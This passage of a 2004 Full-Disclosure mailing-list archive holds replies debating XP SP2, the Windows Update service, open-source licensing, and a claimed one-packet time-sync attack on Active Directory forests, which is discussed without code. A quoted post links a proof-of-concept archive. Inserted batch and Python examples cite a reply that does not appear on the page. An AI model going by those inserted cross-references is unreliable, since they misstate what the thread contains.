 before, then you surely don't want to run Windows Updates ever. If you 
 want to cull some real system resources and have not already done so, 
 turn the Help and Support service to manual, that will save ~30mb on 
 boot, up until the first use of XP help; this will stop help links 
 from programs from forwarding to the correct page, until the service 
 has loaded once.
 
 As for worry over using bandwidth on your internet service, again, you 
 want to check

RE: Re[2]: [Full-Disclosure] Security aspects of time synchronization infrastructure

2004-08-20 Thread joe
Thanks.

So assuming that the time change of a great (epoch date) magnitude could
occur [1], it would occur in a fluid way across the entire forest (or at
least the MS machines that are part of it). Have you actually tried to
change time to some arbitrarily large and incorrect value and see if other
machines can sync when it is set that way or is this speculation? 

Beyond that, time maintained on the Windows machines is not time_t based, it
is FILETIME based (64 bit value which is the number of 100 nanosecond
intervals since 1/1/1601) format which should be able to represent any 4
digit year > 1601. It can probably go beyond 4 digits but I don't expect any
date routines will support a 5 digit year (holy crap - we now have a Y10K
issue thanks MS, can't wait to have to deal with that one). 

Now that I see where you are going in terms of a vast major change to epoch
ending, assuming the time change would sync across the forest I would guess
that you could have a breakdown in kerberos if you somehow pushed the date
beyond time_t capabilities but that is a guess. I am not sure how kerberos
time is represented in the kerberos internals, are you aware of that format?
Is it time_t? I would say that would be the main thing that could prompt you
to say that the forest would be down. I would expect local logons to domain
controllers by admins would still work (though they would probably have to
change their password while logging on), the overall functionality of the
environment would be unavailable - but again, this assumes kerberos stops
working. 

Also I would guess various and sundry apps (or services) would possibly do
odd things based on how they internally needed and used time. I would guess
the event logs might be a little hokey for some apps. Accounts would lock if
something was automatically sending the now bad passwords and not responding
to the password has expired message (this assumes kerberos is working at all
though which means the forest is actually up). This would impact mostly
service accounts I would guess as well as network/application connections
for people who were currently logged in. 

I really don't see why you feel a 12 hour change would hurt that much other
than forcing an early refresh on kerb tickets. Do you have more detail on
your thoughts on that? Specifics.

So besides getting to a point where kerberos breaks due to how the time is
structured in kerberos I don't see a forest that is down. If the time
changed exceeded your tombstone period AND synced properly I could see
replication stopping due to the delta from the last replication and not
wanting to corrupt with possible bad data (i.e. lingering/revived objects).
However the forest would be up and functioning in terms of authentication,
you would just have to get the time corrected so replication kicks back in -
which if it allowed the change in the first place, the change in the second
place should be pretty easy.

Anyway, I don't know how much of this I would push as an issue without
actually testing to see what would happen. If the date was able to be pushed
far enough, it could be painful, if kerberos is time_t based, then it could
break. I would suggest working that out specifically. If you can actually
force a bad date into the PDC emulator of the forest (and I am not arguing
this point, I don't know enough about it), will it sync to the rest of the
forest? And if so, can the date change be enough to break kerberos? I think
in order to call the forest down, you would have to break either name
resolution or authentication. I don't see name resolution breaking here, so
you focus on authentication which would fall on kerberos. 

  joe


[1] I am still not entirely confident would occur, I think the downstreams
would reject the time source but have no solid testing to prove this. 


 

-Original Message-
From: 3APA3A [mailto:[EMAIL PROTECTED] 
Sent: Friday, August 20, 2004 2:22 AM
To: joe
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re[2]: [Full-Disclosure] Security aspects of time synchronization
infrastructure

Dear joe,



--Friday, August 20, 2004, 2:59:06 AM, you wrote to [EMAIL PROTECTED]:

j If network is configured in accordance with these recommendations it's 
j possible  to  bring  whole Windows 2003 forest down with a single UDP 
j packet.

j What is your line of reasoning here? In a properly configured forest, 
j all machines will take their time from their default time source and 
j not from a preconfigured machine as you outlined. If the time on the 
j PDC emulator of the forest is spanked into a new value, either the 
j other machines will be unable to sync with it due to not being able 
j to authenticate with it or the

Time synchronisation doesn't require authentication, at least it looks
like packets are only signed with the computer key. That's why it's still
possible to change time across the whole forest with a single packet, if one of
the forest's reliable time sources or PDC emulator in root domain

RE: [Full-Disclosure] Windows Update

2004-08-20 Thread joe
Yep, this is how it works now.

You control whether Windows Update is updating or not via the security panel
in the control panel applets (wscui.cpl). 

Of course if you aren't using automatic update you could always disable the
service and just reenable when you go to do the update, or don't use windows
update at all and just pull the downloads separately. We are talking about a
single command line to reenable that service

If you like it disabled

To enable 
sc config wuauserv start= demand && net start wuauserv

To redisable
sc config wuauserv start= disabled && net stop wuauserv


If you can live with it not being autostart
To enable 
net start wuauserv

To redisable
net stop wuauserv


You could even make a batch file to launch windows update and have it make the
changes for you. If you want to get really fancy writing an app to do that
wouldn't be overly involved either and then you can just replace what is
fired by the icon for Windows Update. 



Is it a pain? Yes, for those who like to run minimal services. Is it a
security issue or life threatening, probably not. 


As for SP2 not being available for Pro on WU yet, that is also correct.
Corporations asked for a hold on the launch so they can get some testing
done and if necessary get a registry change in place to block WU auto
updates of SP2 until later. You obviously still can manually go download it.
It will not be available for Pro on WU until at least 8/25/2004. 



  joe
 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of ISNYC
Sent: Friday, August 20, 2004 1:31 PM
To: 'Security List'; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] Windows Update

I have had that same issue.

Check to see if your BITS Service is on.
I had mine disabled. It didn't like that.

Try enabling the BITS service, then try again.

I have Automatic Updates disabled now, and I can update manually.

Ez.





-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Security List
Sent: Friday, August 20, 2004 11:51 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Windows Update


Went to windows update last night w/ XP Pro. 
Redirected to the v5 version.  I was asked to install the new Windows Update
software...downloaded the WU software...copied the files...then saw
registering...kinda thinking that it was checking for a valid registration
or license.  No updates needed according to WU.  XP SP2 is not available via
WU for XP Pro yet.

Now, I checked the Automatic Update service to see if it was turned back
start automatic as I always have it disabled.  Yup, it was set to automatic
and it was started.  I stop and disable automatic update service, and try
WU.  Get error stating that the automatic update service must be enabled to
use WU now.  Has anybody else heard of this?  Once again, we must have
services that we do not want enabled.  I can not believe that they are
forcing users to turn on the service to use WU.







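The 2004-08-24 reply earlier on this page and this one describe the same workaround: keep wuauserv disabled and change its start type only while visiting the Windows Update site. As an added example that is not part of any message in the thread, the batch file below does that in one step with the same sc.exe and net commands the reply shows. It records the current start type so it can put it back afterwards, sets the service to automatic (the later reply reports that the v5 site rejects a service that is merely set to manual), makes sure BITS can start as ISNYC suggests, opens the site, and reverses the change once you press a key. The Internet Explorer path and the site URL are assumptions for Windows XP; wuauserv and bits are the real service names.

```batch
@echo off
rem wu.cmd -- run Windows Update with the Automatic Updates service enabled
rem only for the duration of the visit, then restore the previous start type.
rem Added example for this thread, not taken from any of the messages.
rem Assumes Windows XP/2003 with sc.exe, net.exe and Internet Explorer.
setlocal

rem Record the current start type of wuauserv (2=AUTO 3=DEMAND 4=DISABLED)
rem from the "START_TYPE : 4 DISABLED" line that "sc qc" prints.
set WU_START=
for /f "tokens=3" %%t in ('sc qc wuauserv ^| findstr /c:"START_TYPE"') do set WU_START=%%t
if "%WU_START%"=="" (
    echo Could not query wuauserv; are you running as an administrator?
    exit /b 1
)
set WU_RESTORE=demand
if "%WU_START%"=="2" set WU_RESTORE=auto
if "%WU_START%"=="4" set WU_RESTORE=disabled

rem The v5 site checks that Automatic Updates is set to start automatically,
rem so "auto" rather than "demand" is used while the site is open.
rem BITS must also be startable or the download step fails.
sc config wuauserv start= auto >nul
sc config bits start= demand >nul
net start bits >nul 2>&1
net start wuauserv >nul 2>&1

rem Assumed IE location and site URL for Windows XP.
start "" "%ProgramFiles%\Internet Explorer\iexplore.exe" http://windowsupdate.microsoft.com/
echo Windows Update is open in Internet Explorer.
echo Press any key when the updates are done to stop the service again.
pause >nul

rem Undo: stop the service and put back whatever start type it had before.
net stop wuauserv >nul 2>&1
sc config wuauserv start= %WU_RESTORE% >nul
echo wuauserv restored to start type "%WU_RESTORE%".
endlocal
```

Run it from an elevated command prompt; sc config needs administrative rights. If the machine normally runs wuauserv in manual mode, the script leaves it that way afterwards rather than forcing it to disabled.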


RE: [Full-Disclosure] Microsoft Windows XP SP2

2004-08-19 Thread joe
I believe the $300 million figure being quoted has the marketing of SP2 in
there. They want to get the word out globally to get patched and are
supposed to do a lot to help out the folks in areas that can't get it off
the NET. Also I believe they are supposed to pull the current retail boxed
copies of XPs in stores and replace with XP2 versions. Also many security
pros have petitioned Microsoft to release SP2 CDs like AOL CDs - have them
for free in computer stores and magazines, etc. Whether that will happen or
not remains to be seen. But MS is pretty adamant about trying to get as many
machines patched as possible. 

  joe

 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
[EMAIL PROTECTED]
Sent: Thursday, August 19, 2004 11:35 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Microsoft Windows XP SP2



Let's commence by giving credit where credit is due. The thinking is that
the manufacturer of Windows XP has done a splendid job in patching their
little operating system with 300 million dollar's worth of fixes. This is
not exactly 'pocket change'.

But this is:

1. trivial scripting in the local zone
2. notepad icon regardless of file in XP's little zip thing

http://www.malware.com/malware.sp2.zip

many other 'bits and pieces' to be had but overall a splendid effort on the
manufacturer's part [for now]. Not quite sure where all that money went
though.


End Call


--
http://www.malware.com









RE: [Full-Disclosure] Security aspects of time synchronization infrastructure

2004-08-19 Thread joe
Interesting paper. I am curious about this statement though as you seemingly
don't give supporting information.

If network is configured in accordance with these recommendations  it's
possible  to bring whole Windows 2003 forest down
with a single UDP packet. 

What is your line of reasoning here? In a properly configured forest, all
machines will take their time from their default time source and not from a
preconfigured machine as you outlined. If the time on the PDC emulator of
the forest is spanked into a new value, either the other machines will be
unable to sync with it due to not being able to authenticate with it or the
forest time will change and authentication will continue on. It could impact
kerberos certs in that they may need to be reissued sooner, but I fail to
see an issue where the entire forest could be brought down. I could see this
having adverse effects on MIT trusts and non-MS kerberos clients unless they
have the Vintela or Centrify *nix/Win integration software (or other
software configured to do the same) that forces a timesync with the Forest. 

If you would prefer to discuss offline, that is fine as well.

  Thanks, joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of 3APA3A
Sent: Thursday, August 19, 2004 5:26 PM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Security aspects of time synchronization
infrastructure

Hello bugtraq,

  I published a whitepaper called "Security aspects of time
  synchronization infrastructure". It describes some observations on
  very common security flaws in time synchronization infrastructure
  design, including (but not limited to) MS Windows Active Directory.

  http://www.security.nnov.ru/advisories/timesync.asp

  Any comments are very appreciated.

--
/3APA3A


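The FILETIME, time_t and Kerberos clock-skew points raised in this reply and in the 2004-08-20 follow-up earlier on this page can be checked with a few lines of arithmetic. The script below is an added illustration, not code from either message or from 3APA3A's paper. The facts it relies on: FILETIME counts 100 ns ticks from 1601-01-01 and reaches the year 30828 before a signed 64-bit value runs out; a signed 32-bit time_t ends in January 2038; and KerberosTime on the wire is ASN.1 GeneralizedTime (RFC 1510 / RFC 4120), a four-digit-year string rather than a time_t, so the 2038 limit only bites an implementation that stores times as 32-bit time_t internally. The 5-minute skew, 10-hour ticket lifetime and 60-day tombstone lifetime are assumptions taken from the Active Directory defaults of the period, not values stated in the thread.

```python
"""FILETIME, Unix time_t and Kerberos clock-skew arithmetic.

Added illustration of the reasoning in the time-synchronisation exchange;
this is not code from either message.  Assumptions (not stated in the
thread): Kerberos maximum tolerable clock skew 5 minutes and TGT lifetime
10 hours (Active Directory defaults), tombstone lifetime 60 days (the
Windows 2000/2003 forest default of that era).
"""
from datetime import datetime, timedelta, timezone

TICKS_PER_SECOND = 10_000_000                    # FILETIME counts 100 ns intervals
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Seconds between the two epochs: 11644473600.
EPOCH_DELTA_SECONDS = int((UNIX_EPOCH - FILETIME_EPOCH).total_seconds())
SECONDS_PER_MEAN_YEAR = 31_556_952               # 365.2425 days, Gregorian mean

MAX_CLOCK_SKEW = timedelta(minutes=5)            # assumption: AD default Kerberos policy
TGT_LIFETIME = timedelta(hours=10)               # assumption: AD default ticket lifetime
TOMBSTONE_LIFETIME = timedelta(days=60)          # assumption: Win2000/2003 default


def unix_to_filetime(t: int) -> int:
    """Convert a POSIX time_t (seconds) to a FILETIME tick count."""
    return (t + EPOCH_DELTA_SECONDS) * TICKS_PER_SECOND


def filetime_to_unix(ft: int) -> int:
    """Convert a FILETIME tick count back to POSIX seconds (truncating)."""
    return ft // TICKS_PER_SECOND - EPOCH_DELTA_SECONDS


def filetime_max_year() -> int:
    """Year reached by the largest positive signed 64-bit FILETIME.

    datetime stops at year 9999, so the year is derived with mean-year
    arithmetic instead of by constructing a datetime.
    """
    max_seconds = (2**63 - 1) // TICKS_PER_SECOND
    return 1601 + max_seconds // SECONDS_PER_MEAN_YEAR


def time_t32_max_year() -> int:
    """Year in which a signed 32-bit time_t overflows (the 2038 problem)."""
    return (UNIX_EPOCH + timedelta(seconds=2**31 - 1)).year


def kerberos_time(dt: datetime) -> str:
    """KerberosTime is ASN.1 GeneralizedTime, YYYYMMDDHHMMSSZ (RFC 1510 /
    RFC 4120): a four-digit-year string, not a time_t."""
    return dt.astimezone(timezone.utc).strftime("%Y%m%d%H%M%SZ")


def kerberos_accepts(client_time: datetime, server_time: datetime,
                     max_skew: timedelta = MAX_CLOCK_SKEW) -> bool:
    """Server-side timestamp check: outside the skew window the request is
    rejected (KRB_AP_ERR_SKEW) and the client has to resynchronise."""
    return abs(client_time - server_time) <= max_skew


def assess_jump(jump: timedelta, whole_forest_moved: bool) -> dict:
    """Classify a forced time change the way the thread reasons about it.

    Only some hosts moved: every Kerberos exchange between a moved and an
    unmoved host fails the skew check until they resynchronise.
    Whole forest moved together (joe's hypothesis): authentication carries
    on, existing tickets merely expire early, and a delta beyond the
    tombstone lifetime is what the thread argues would halt replication.
    """
    magnitude = abs(jump)
    return {
        "kerberos_skew_errors": not whole_forest_moved and magnitude > MAX_CLOCK_SKEW,
        "tickets_expire_early": whole_forest_moved and jump > TGT_LIFETIME,
        "replication_at_risk": whole_forest_moved and magnitude > TOMBSTONE_LIFETIME,
    }


if __name__ == "__main__":
    now = datetime(2004, 8, 20, 12, 0, 0, tzinfo=timezone.utc)   # constructed sample instant
    print("FILETIME max year:", filetime_max_year())
    print("32-bit time_t max year:", time_t32_max_year())
    print("KerberosTime now:", kerberos_time(now))
    print("12 h jump, forest-wide:", assess_jump(timedelta(hours=12), True))
    print("12 h jump, PDC emulator only:", assess_jump(timedelta(hours=12), False))
    print("90 day jump, forest-wide:", assess_jump(timedelta(days=90), True))
```

The interesting case for the thread is the second print line: a 12-hour change that reaches only the PDC emulator breaks every exchange with hosts still on the old time, while the same change applied forest-wide only forces early ticket renewal, and nothing in either case touches name resolution.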


RE: [Full-Disclosure] lame bitching about xpsp2

2004-08-18 Thread joe
. 





OT Stuff

Anyway let me clarify a couple of things that the poster is incorrectly
assuming and/or attributing to me.

 If only a #define statement were copied they wouldn't 
 be obligated to disclose it's source.

When I say they still have to acknowledge the source it means that execs
worrying about lawsuits would much rather quote a source of information or
code, no matter how small, than risk going to court because someone else
perceives its use without acknowledgment. The point at which they wouldn't
feel ANY need to do so is if they purchased rights to the code which may
possibly be the reason you see so few references to other vendors who have
obviously contributed to Windows. The fact that they implement a standard ip
at all means there is some sort of derivation path somehow back to Berkeley,
whether it comes through code bought from another company or directly used
from BSD.

I did not say that the only use was a #define, what I said was that would be
enough to get MS to document it if they didn't otherwise outright own the
rights. If you pick up a #define straight out of someone else's file without
change, you are borrowing their work. It is small, but you are still
borrowing. Someone may come looking because they may think it is more than a
#define especially if the define betrays functionality not publicly
documented. Not saying that is the case here so try not to read into what I
am trying to say other than acknowledging use of someone else's code can
occur even if it is some small piece, even if they aren't legally required. 

I agree that having code doesn't tell you lineage. You can look at it and
look at something that you think it is derived from and get a possible
answer but it would be difficult to ever prove it was or wasn't lifted
unless it was verbatim up to and including the same silly misspellings and
such. However, if the code documents its sources such as the main body of
this code came from such and such corporation or these lines came from such
and such a file in such and such distribution, you can either believe it is
all a lie or you can go with Occam's razor. I choose the latter. I do,
however, admit that I don't feel MS is evil Satan spawn trying to take my
first born and my freedom of choice away. Once I don't have the option to
buy or otherwise get a hold of alternate Operating Systems that are
available then I may change my opinion. I don't see that ever happening
though I do expect some collapse of the number available based on infighting
and business/funding model. 


 The existence of an alternative does not make the 
 alternative readily available.  You need a readily 
 available alternative to prove your point, and right 
 now that doesn't exist. 

I would say this is a pretty poor comment on our current position. The fact
that you had issues getting what you wanted from where you wanted doesn't
mean alternatives are not readily available.


 The only problem I see there is that the BSD people 
 didn't have the foresight to license their code under 
 the GNU GPL

I think this could only have hurt its use and deployment. Many large
businesses do not like GNU. Many people don't like it. I don't like it. I
will never use GNU code within my code, I will rewrite what I need from
scratch if I need it badly enough. I won't share my source, I tried, it
turned out to be more pain than it was worth. I will use GNU licensed
software because I like some of the stuff out there but I would use it even
if it weren't GNU. I don't see why I should have the right to look at the
source in order to use software. I am using the software by my choice, no
one forces me to sit at a computer.


 They've already been declared a monopoly.

This one always made me chuckle. The whole thing is based on the concept
that there is no commercially viable alternative to Windows. This doesn't
seem to be what the OSS and Apple vendors think or say. Munich doesn't think
so... Google doesn't think so. If this were the actual truth, you wouldn't
see Red Hat, Suse/Novell, Mandrake, etc doing what they do. I didn't think
this was accurate in 99 and don't think so now. You obviously don't think so
if you went to so much trouble to get an alternative, it is obviously a
viable alternative to you and it sounds like IBM was trying to make it
profitable for them. Another piece that is hilarious is

While Microsoft may not be able to stave off all potential 
paradigm shifts through innovation, it can thwart some and 
delay others by improving its own products to the greater 
satisfaction of consumers.

Holy cow, they can maintain customers by making a better product, that
certainly is a monopoly and hurting the consumers. THEY MUST BE STOPPED!



  joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Barry
Fitzgerald
Sent: Tuesday, August 17, 2004 2:34 PM
To: joe
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] lame bitching about xpsp2

joe wrote

RE: [OT] Re: [Full-Disclosure] lame bitching about xpsp2

2004-08-18 Thread joe
Since you cut out every piece that had anything to do remotely with this
list, I will respond very briefly and then fail to respond to any more list
posts on this from you unless you come back to the subject of security and
away from OSS vs proprietary code.

I know what is from what source based on the comments in the source. Whether
or not you believe I know this info is well past any caring that I have for
the subject.

I am not going to do your shopping for you. I will let you go ahead and type
linux in the search box at Dell and look at what your options are. Last time
I looked a couple of weeks ago for my brother, the lowest priced Linux
machine was something like the 370 or something like that for $900 or so.
Walmart (world's largest retailer, sorry it doesn't fit your definition of
who should sell a computer) has Linux PCs for like $300. PCs without any OS
for like $225, again it has been a few weeks since I looked though. As for
IBM, no clue what is on their site. Wouldn't buy anything from them,
overpriced with crappy quality. If you can't find a Linux PC from IBM though I
find that humorous considering IBM's public stance on Linux... 

There is nothing in the world I can say to convince you about others'
stances on GNU. I don't really care to try. It is simply another religious
point for you. As to your entire argument about it, you're wrong. Note I
previously said I wouldn't use GNU, I haven't used GNU, hence I haven't had
an issue with it as you assume. I read the license and said NFW. There is
open source outside of GNU. Nothing GNU has/does would have helped with the
issues I had with source I shared.

  Thanks, joe
 

-Original Message-
From: Barry Fitzgerald [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 18, 2004 11:56 AM
To: joe
Cc: [EMAIL PROTECTED]
Subject: [OT] Re: [Full-Disclosure] lame bitching about xpsp2

joe wrote:

If only a #define statement were copied they wouldn't be obligated to 
disclose its source.



I did not say that the only use was a #define, what I said was that 
would be enough to get MS to document it if they didn't otherwise 
outright own the rights. If you pick up a #define straight out of 
someone else's file without change, you are borrowing their work. It is 
small, but you are still borrowing. Someone may come looking because 
they may think it is more than a #define especially if the define 
betrays functionality not publicly documented. Not saying that is the 
case here so try not to read into what I am trying to say other than 
acknowledging use of someone else's code can occur even if it is some small
piece, even if they aren't legally required.

  

Understood - but your point was still incorrect.

You're showing here that you really don't know exactly what was from what
source.  I, personally, have no problem with that.  It's not a crime.  My
only question is why try to confuse things and make the point that the Win2k
TCP/IP stack is not derived from BSD's code when you, in fact, can't say
either way?


The existence of an alternative does not make the alternative readily 
available.  You need a readily available alternative to prove your 
point, and right now that doesn't exist.



I would say this is a pretty poor comment on our current position. The 
fact that you had issues getting what you wanted from where you wanted 
doesn't mean alternatives are not readily available.

  

OK - put your money where your mouth is.  Pretend I'm a consumer.   I 
have 2000 USD to spend and want a good PC with a good warranty with
GNU/Linux on it.  Find me a link to a major OEM that will ship me a PC
within those specs with decent hardware and a generally recognized name
(Dell, Gateway, HP, IBM...). 

The PC must be listed as a desktop system and must be easy to find.

That's your assignment.  That's the way that you can prove your point, and
it's the only way. 

If the situation is as you claim it is, that should take you no less than 3
minutes.  The clock is ticking...

The only problem I see there is that the BSD people didn't have the 
foresight to license their code under the GNU GPL



I think this could only have hurt its use and deployment.

I suppose... if you count code taken from *BSD and added to proprietary 
projects, then I'd agree...  I don't personally count that as 
deployment, though.

 Many large businesses do not like GNU. 

Ignorance will do that.

Many people don't like it. 

Ignorance will do that.

I don't like it. 

I think you're seeing my pattern.  :)  (It's not meant as a personal, ad 
hominem attack.  Ignorance is OK.  Admitting that it is the case is the 
first step to solving the problem.)

I will never use GNU code within my code, I will rewrite what I need from
scratch if I need it badly enough. I won't share my source, I tried, it
turned out to be more pain than it was worth. 

I'm curious what you did that was so difficult.  Adding source code to a 
package is not particularly difficult. 

I will use GNU

RE: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write code with security in mind. lame bitching about xpsp2

2004-08-18 Thread joe
I think you meant your first line to be

All OS vendors should bite the bullet and re-write their code with security
in mind.

Not sure why you singled MS out for that statement. Especially considering
the rest of the post. 

  joe


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Clairmont, Jan
M
Sent: Wednesday, August 18, 2004 11:52 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] RE: [Full-Disclosure]MS should re-write code with
security in mind. lame bitching about xpsp2

M$ should just bite the bullet and re-write Windows with security in mind,
give it a true process scheduler, multiuser,
with Windows as client/server processes.  Build in 256 bit encryption and
secure communications between processes and external communication with no
unencrypted traffic.  That would shut down a lot of these mindless bugs.
All mail should be encrypted and point-to-point, with the mail servers only
able to re-direct and broadcast mail with authentication.   Maybe we could
slow a lot of the hacking down and spam.  But again, until the marketplace
demands it, for M$, Linux and everybody else it's business as usual.

Keeps us employed I guess.

Jan Clairmont
Firewall Administrator/Consultant


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] lame bitching about xpsp2

2004-08-17 Thread joe
 South California's, University of Michigan's and others, 
 which just shows that Windows isn't really written purely by M$...
 Of course, most, if not all, or even more, are still in Windows 2003.

I didn't say that they didn't use BSD pieces, I said that he wasn't as
accurate as he likes to think for the statement where he was naming specific
tools and pieces. Use of BSD pieces doesn't mean that it was used in its
entirety or even a lot, just that it was used in some manner, it could
possibly be limited to #define statements in a header file. If that is done
they still have to acknowledge the source. It can even be to acknowledge IP.
I've looked at most of the components the poster spoke of, not the release
notes; I am familiar with what companies and orgs the pieces came from.

I know I didn't even start to imply that MS had written all of Windows from
scratch. Actually I think that is one of the issues in that many pieces they
didn't completely write get thrown together with other pieces they did
write. However if you can buy a tcp/ip stack or a zip implementation or a
SQL Server or metadirectory for less than it takes to build it and grow the
experience in-house, it makes business sense to do so. Microsoft is a
business. Once you realize that, you understand idealism and religion have
no place here. 

 Sure, they invest in companies writing software, 
 but only cause it doesn't compete in their main market.

To this all I can say is duh? How often do you see Ford giving money to GM,
Hershey giving it to Morley, Goodyear giving it to BF Goodrich. Companies
INVEST money in other companies, they DONATE money to charities. If two
companies in the same market get together on a project they do it for mutual
benefit and then have to duck as the government comes after them. 

Microsoft invested a great deal of money into ActiveState to push
development of perl for the Win32 platform, do you feel they are out to make
perl a Microsoft product? Even though many of us have asked for perl
built-in they won't do it even though they have invested millions in it.


 But there aren't that many companies that do that. 

But there are, that is the point. There would be more companies doing so if
there was a market and a profit to be had in this space. i.e. If everyone
hated MS and Windows as much as you would like to think, other options would
be used. This isn't electricity where you get it through one company or
can't get it at all. This isn't oil where you only have one company
processing it. It isn't that you have no choice but to use a computer loaded
with MS Software. 


 So most people end up buying MS software even if they don't want it.

Those people are flipping idiots. If they did that I could see how they would
be so mad. Easier to blame someone else than themselves for being a moron.


 And have you tried getting the refund for the cra^H^H^Hunwanted software?

No, because I don't buy things I don't want. Buying something you don't want
and then whining for a refund is a bit silly don't you think?


 Incorrect. Under UK law a company has a monopoly once:
 Market share is over 25%
 High Barriers to entry
 Abnormal Profits
 Can exercise control over price or output

I see, so Microsoft is exercising control over the price and output of other
Operating Systems? How much did they make you pay for your last copy of
Linux or BSD or ? Define what abnormal profits are? Because one company only
makes 1% on their gross does that mean anyone making 10% on their gross is
close to being called a monopoly?


 Ah, a traditional argument. The users are stupid, except I know 
 some users who are far, far more intelligent than you or I.

If they are far more intelligent than I on Windows then they are outside the
scope of this discussion because I am betting they patch and otherwise
secure their machines just fine. 


So to try and bring this back in once again, what are your specific gripes
about XP SP2? Did it work for you when you loaded or not? Do you even have a
Windows machine to load it on to have an opinion?

  joe





 

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of ktabic
Sent: Tuesday, August 17, 2004 11:35 AM
To: [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] lame bitching about xpsp2

On Mon, 2004-08-16 at 19:13 -0400, joe wrote:



RE: [Full-Disclosure] SP2 is killing me. Help?

2004-08-17 Thread joe
 And as for backwards compatibility, OSS software 
 generally doesn't have to worry about backwards 
 compatibility, the source is available, so most 
 of the time it's possible to make it work. Oh, 
 and I find wine on linux offers better than M$, 
 for my needs.
 
You talk throughout your email about many people at home and then also
insert this gem into it... So it is ok if you break older functionality if
you supply the source? What on earth for? So someone can change it to make
it work again for themselves? Does this apply to even a majority of the OSS
users let alone masses of home users? 

Most people wouldn't know a compiler if it bit them on the little toe. Even
if they had, the vast majority can't figure out how to protect themselves
from things they should have been able to protect against for a while now
with firewalls and such, yet you figure they can go into some OS C code and
tweak it to fit themselves better?

I thought we had gotten past the idea that having source so you can modify
it to make it work for your particular instance was such a huge benefit.
This is a tremendous nightmare for source control and patching and
ultimately security. Having source to look at to see what it is doing is a
good thing, having source so you can modify it to suit your needs is less
so. 

 joe



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of ktabic
Sent: Tuesday, August 17, 2004 12:22 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] SP2 is killing me. Help?

On Tue, 2004-08-17 at 10:33 -0300, James Tucker wrote:
 On Mon, 16 Aug 2004 12:52:53 +, ktabic [EMAIL PROTECTED] wrote:



RE: [Full-Disclosure] lame bitching about xpsp2

2004-08-16 Thread joe
I am trying to figure out from all of your posts if you are just a troll or
truly think you are saying something that can help.

You complain about the past and then complain about SP2 in the same breath
like you are saying, I don't like what they did, so I don't like what they
will ever do. This is pretty silly. You follow with an RFC rant, so even as
MS has started following RFC very closely (too closely for some who now
realize they didn't want RFC compliance, they wanted MS to do it the
*nix way) you still would whine because they are also working on extending
the RFCs to make them more useful or not following de facto *nix standards
even if they aren't RFC. 


 Well it's similar at people who refuse somit in block 
 before having tried it, it's just plain stupidity and 
 their ego gets hurt thinking they might have to start 
 from zero.

I can't really understand what you are saying here but it sounds like you
are concerned that you will have to learn Windows, is this your real
problem?


 but after MacOS, I am pretty sure even M$ will use Unix as 
 a base in future windows versions

I do not work for MS but would be very comfortable in saying this will not
occur. Had MS wanted to follow a *nix like path, they could have a long time
ago... They were doing *nix back in 1980. 


 Longhorn boasts msh, the M$ shell.
 (sh, geez, that's original).

Two things. First, have you seen Monad? If not, you might want to look at it
before even trying to spout your normal uninformed opinion. You will
probably find that someone is going to be trying to duplicate portions of
that functionality in your favorite non-MS OS shortly. Second, now you are
whining about names?


 The goal of M$ is to achieve total control of information,

Err no, their goal is to maintain a profit and compete as a business like
they always have. The Microsoft world is not so religious as you have been
raised to think. I realize this is unknown to you. But have faith...


 M$ business model is a threat to our freedom, and I would 
 like our children to have a choice, and not be formatted 
 the M$ way.

Last I looked, MS wasn't the only OS writer out there and you aren't being
forced to use it. How is it that your children won't have a choice? Or are
you forecasting the death of the *nix derivatives? I hope not and expect you
are wrong if you are, they have their uses. 


Your overall post is silly. You complain and whine saying MS is doing this,
this and that wrong, but if there is any attempt on their part to correct
things you just whine about that as well. Admit it, there is nothing that MS
could do that would make you say, hmmm, maybe they have a good idea here. I
can almost visualize the spittle forming on your lips as you type your
responses. Dude, chill out. 


BTW, re some of your other posts. 

I recall nimda and I don't recall my Windows machines getting infected even
though they sat on the internet. Sounds like it was a patching issue after
all... 

You argue to use Windows like systems (e.g. OpenOffice), just not Windows.
This simply points out you have a hard on for Microsoft, not that you have
anything worth listening to. Making business users use non-Windows systems
will not magically build in them a wish to learn more and become more
computer proficient. Most business users don't really much like computers
and view them as a necessary evil. Windows is tolerable because they have
been using it at home and have a good idea on how to use it (which BTW,
having all of those Windows machines at home helps reduce training costs at
work). Slapping some alternative OS on the desktop be it Mac, BSD, *nix, or
BeOS isn't going to cause a great desire to learn computers. Period. 

On the permissions thing. Windows could be locked down and run as non-admins
ages ago. We did it in a corporate environment in 96 with NT. What were the
results? People bitching because they couldn't load software they wanted to
load that had nothing to do with work and a rebuild rate going from at least
one machine a week (we had thousands of machines) to none in six months. Of
course if you run a different OS, the users won't complain about not being
able to do what they want... Oh wait yes they will, some people thought the
same for the Win31 to WinNT 4 upgrade because it was a different OS with a
different look and different rules and more security. 

There are two benefits that a company would get right now if they jumped
whole hog from Windows. 1. The misconception of lower cost of ownership
because of reduced licensing costs and perceived reduction in cost of
patching (*nix never has to be patched, it is never on the news).  2. Less
